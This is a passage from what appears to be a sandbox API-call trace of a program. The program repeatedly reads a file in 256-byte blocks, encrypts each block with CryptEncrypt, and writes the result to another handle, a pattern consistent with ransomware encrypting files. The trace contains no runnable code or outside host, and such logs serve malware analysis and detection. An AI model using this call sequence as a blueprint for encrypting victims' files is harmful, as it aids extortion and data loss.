lpBuffer=0x2892040*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.638] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.638] GetLastError () returned 0x0 [0166.638] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.638] ReadFile (in: hFile=0x15b0, lpBuffer=0x2892040, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2892040*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.638] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.638] GetLastError () returned 0x0 [0166.638] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.638] ReadFile (in: hFile=0x15b0, lpBuffer=0x2892040, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2892040*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.638] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.638] GetLastError () returned 0x0 [0166.638] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.638] ReadFile (in: hFile=0x15b0, lpBuffer=0x2892040, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2892040*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.638] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.638] GetLastError () returned 0x0 [0166.638] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.638] ReadFile (in: hFile=0x15b0, lpBuffer=0x2892040, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2892040*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.638] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.638] GetLastError () returned 0x0 [0166.638] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.638] ReadFile (in: hFile=0x15b0, lpBuffer=0x2892040, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2892040*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.639] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.639] GetLastError () returned 0x0 [0166.639] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.639] ReadFile (in: hFile=0x15b0, lpBuffer=0x2892040, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2892040*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.639] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.639] GetLastError () returned 0x0 [0166.639] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.639] ReadFile (in: hFile=0x15b0, lpBuffer=0x2892040, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2892040*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.639] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.639] GetLastError () returned 0x0 [0166.639] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.639] ReadFile (in: hFile=0x15b0, lpBuffer=0x2892040, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2892040*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.639] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.639] GetLastError () returned 0x0 [0166.639] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.639] ReadFile (in: hFile=0x15b0, lpBuffer=0x2892040, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2892040*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.639] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.639] GetLastError () returned 0x0 [0166.639] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.639] ReadFile (in: hFile=0x15b0, lpBuffer=0x2892040, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2892040*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.639] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.639] GetLastError () returned 0x0 [0166.639] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.639] ReadFile (in: hFile=0x15b0, lpBuffer=0x2892040, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2892040*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.639] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.639] GetLastError () returned 0x0 [0166.639] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.640] ReadFile (in: hFile=0x15b0, lpBuffer=0x2892040, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2892040*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.640] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.640] GetLastError () returned 0x0 [0166.640] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.640] ReadFile (in: hFile=0x15b0, lpBuffer=0x2892040, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2892040*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.640] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.640] GetLastError () returned 0x0 [0166.640] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.640] ReadFile (in: hFile=0x15b0, lpBuffer=0x2892040, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2892040*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.640] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.640] GetLastError () returned 0x0 [0166.640] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.640] ReadFile (in: hFile=0x15b0, lpBuffer=0x2892040, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2892040*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.640] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.640] GetLastError () returned 0x0 [0166.640] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.640] ReadFile (in: hFile=0x15b0, lpBuffer=0x2892040, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2892040*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.640] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.640] GetLastError () returned 0x0 [0166.640] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.640] ReadFile (in: hFile=0x15b0, lpBuffer=0x2892040, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2892040*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.640] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.640] GetLastError () returned 0x0 [0166.640] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.640] ReadFile (in: hFile=0x15b0, lpBuffer=0x2892040, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2892040*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.641] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.641] GetLastError () returned 0x0 [0166.641] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.641] ReadFile (in: hFile=0x15b0, lpBuffer=0x2892040, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2892040*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.641] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.641] GetLastError () returned 0x0 [0166.641] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.641] ReadFile (in: hFile=0x15b0, lpBuffer=0x2892040, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2892040*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.641] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.641] GetLastError () returned 0x0 [0166.641] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.641] ReadFile (in: hFile=0x15b0, lpBuffer=0x2892040, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2892040*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.641] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.641] GetLastError () returned 0x0 [0166.641] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.641] ReadFile (in: hFile=0x15b0, lpBuffer=0x2892040, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2892040*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.641] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.641] GetLastError () returned 0x0 [0166.641] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.641] ReadFile (in: hFile=0x15b0, lpBuffer=0x2892040, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2892040*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.641] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.641] GetLastError () returned 0x0 [0166.641] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.641] ReadFile (in: hFile=0x15b0, lpBuffer=0x2892040, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2892040*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.641] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.641] GetLastError () returned 0x0 [0166.641] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.642] ReadFile (in: hFile=0x15b0, lpBuffer=0x2892040, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2892040*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.642] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.642] GetLastError () returned 0x0 [0166.642] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.642] ReadFile (in: hFile=0x15b0, lpBuffer=0x2892040, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2892040*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.642] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.642] GetLastError () returned 0x0 [0166.642] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.642] ReadFile (in: hFile=0x15b0, lpBuffer=0x2892040, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2892040*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.642] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.642] GetLastError () returned 0x0 [0166.642] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.642] ReadFile (in: hFile=0x15b0, lpBuffer=0x2892040, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2892040*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.642] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.642] GetLastError () returned 0x0 [0166.642] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.642] ReadFile (in: hFile=0x15b0, lpBuffer=0x2892040, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2892040*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.642] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.642] GetLastError () returned 0x0 [0166.642] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.642] ReadFile (in: hFile=0x15b0, lpBuffer=0x2892040, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2892040*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.642] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.642] GetLastError () returned 0x0 [0166.642] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.642] ReadFile (in: hFile=0x15b0, lpBuffer=0x2892040, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2892040*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.643] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.643] GetLastError () returned 0x0 [0166.643] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.643] ReadFile (in: hFile=0x15b0, lpBuffer=0x2892040, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2892040*, 